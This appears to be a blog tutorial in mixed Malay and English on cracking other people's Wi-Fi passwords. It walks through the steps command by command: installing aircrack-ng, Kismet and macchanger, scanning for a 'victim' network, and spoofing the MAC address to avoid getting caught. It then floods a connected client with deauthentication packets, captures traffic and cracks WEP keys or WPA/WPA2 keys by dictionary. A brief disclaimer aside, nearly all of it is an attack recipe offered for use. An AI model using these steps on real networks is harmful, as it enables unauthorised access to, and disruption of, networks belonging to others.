p/s:ni aku aja just buat sebagai ilmu pengetahuan.curi itu tetap berdosa.so korang fikir2 sendiri laa eah?hahaha.
okay.lets start with our tutorial.Actually, we can also hack wifi using ubuntu instead of backtrack.But before that you need to install this 3 important thing.Aircrack-ng,Kismet for sniffing and macchanger.If you want to hack wpa or wpa2 using ubuntu,you need to find pentest dictionary.How to install it?
type this on the terminal.
"sudo apt-get install aircrack-ng"
"sudo apt-get install kismet"
"sudo apt-get install macchanger"
okay.lets proceed with the tutorial.Actually the command that we run for crack the password is same either you are using ubuntu or backtrack because we are actually using same hacking tool.:)
first thing you need to do is disconnect with any internet connection.Just disconnect.Dont switch off the wifi card.
1.run "sudo -s" to become root if you are using ubuntu.Backtrack no need to do that because user are already as root.
2.run "airmon-ng start wlan0"
-->this command used to see which derivative of our wifi card driver active for monitoring.This screenshot shows the card is active by mon0.
2.when you see which name of chipset activated for monitoring,then run this command for scanning any available victim's wifi.(hehe).Run "airodump-ng mon0"
and you will get the monitoring result just like this.
i will hack the yellow one.make sure you press ctrl+c to stop the monitoring.copy the essential information.you need channel,bssid and client.But now we don have the client yet.okay.see at the top line of second picture.You see BSSID?number under BSSID is bssid that we need to copy for future use.CH indicate the channel of the wifi router.
[UBUNTU ONLY]
this step is only for ubuntu user.you need to change the channel,mode monitoring manually.follow this command.
"ifconfig mon0 down"----->down the chipset for mode configuration(unlock)
"iwconfig mon0 mode managed"--->used to managed mode of the chipset
"macchanger -m ff:ff:ff:ff:ff:ff mon0"---->used to change our bssid.Very important indeed for changing to be fake because im sure you dont want to be busted.hahaha.[take note that you need to change 'f' with any number.
"ifconfig mon0 up"--->lock the chipset back
"iwconfig mon0 channel [victim's channel]"---->used to change our chipset channel
"ifconfig mon0 down"---->unlock back
"iwconfig mon0 mode monitor"--->change the mode as monitor
"ifconfig mon0 up"---->lock back
3.Third step is sniffing the target.This step will sniff the target so you can find the client or user of the victim's wifi.run this command.
"airodump-ng -c [channel] -w [target name] --bssid [bssid number] mon0"
here the screenshot.choose either one of the client only.I prefer the highest packet one.
4.on step four we will flood the client to make the data accelerate.Huge number of data is very important for key voting.Now open new terminal and become root for ubuntu.Then,run this command.
"aireplay-ng -0 * -a [bssid] -c [client] -h [your fake bssid] mon0"
the '*' is actually you need to replace with any number.usually i use 0 so the flood is non stop.If you put 6,so the flood will only sent for 6 times.here the screenshot.
5.this step now will let you to catch the reply from the flood thus increase the data acceleration.open new terminal and become root.Dont stop previous flood.The command is "aireplay-ng -2 -a [bssid] -h [your fake bssid] mon0"
usually aircrack will give the most faster client.enter y and press enter.Open new terminal for final step.
6.lastly.JengJengJeng!
we will crack the password.but wait until the data reach 5000 and above first.
run "aircrack-ng (target name)-01.cap".this command used for cracking WEP key.For WPA/WPA2 you need dictionary(pentest).If you are using backtrack so there are no big deal.locate your dictionary first.then type this command.
"aircrack-ng (target name)-01.cap -w" then grab your dictionary (usually .txt file) to the terminal and then press enter.cracking WPA/WPA2 is bloody slow process.if your processor is good then there ain't big deal.The prompt will show like this if you got the key.
finished.Here i show you my total terminal open if you are not sure how many command need to start in a new terminal.
thats all for today.Im sorry for my bad english.I am non-native speaker so on typing.If i got mistake tell me so i can edit it back.Thank you :).